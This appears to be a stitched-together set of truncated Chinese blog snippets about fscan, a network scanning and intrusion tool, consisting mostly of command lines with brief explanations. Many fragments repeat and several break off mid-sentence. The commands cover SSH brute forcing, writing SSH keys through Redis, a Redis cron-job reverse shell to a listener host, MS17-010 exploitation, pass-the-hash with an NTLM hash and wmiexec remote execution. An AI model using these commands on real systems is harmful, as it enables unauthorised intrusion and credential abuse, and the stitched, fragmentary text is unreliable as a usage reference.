常用命令 cd fscan//进入fscan文件夹//执行在windows下为fscan.exe,linux下为./fscan//例如./fscan -h192.168.101.1/24//启动fscan并扫描网段fscan.exe -h192.168.x.x//默认使用全部模块fscan.exe -h192.168.x.x -rf id_rsa.pub//redis 写私钥fscan.exe -h192.168.x.x -c whoami//ssh爆破成功...
-Num int poc rate (default 20) -c string exec command (ssh) -cookie string set poc cookie -debug debug mode will print more error info -domain string smb domain -h string IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168....
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/...
fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息) fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令) fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc 总结 总的来说,fscan 是...
fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令) fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc 这个项目的开发者参考的开源项目有这些: ...
fscan.exe-h192.168.1.1/16(B段扫描) 其他用法 fscan.exe -h192.168.1.1/24-np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe-h192.168.1.1/24-rf id_rsa.pub (redis 写公钥) fscan.exe-h192.168.1.1/24-rs192.168.1.1:6666(redis 计划任务反弹shell) ...
4.3 安装完成最终出现一个可执行文件 mian五、运行使用1 全盘扫描./main -h ip/222跳过存活检测 、不保存文件、跳过web poc扫描更多用法请移步原项目:https://github.com/shadow1ng/fscan/blob/main/README.md免责声明本文发布的工具和脚本、命令,仅用作测试和学习研究,不得用于商业用途,文章不对其合法性...
(指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389-...
fscan.exe -h192.168.1.1/24-m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)fscan.exe -h192.168.1.1/24-nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)fscan.exe -h192.168.1.1/...
(内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具) fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4) fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec...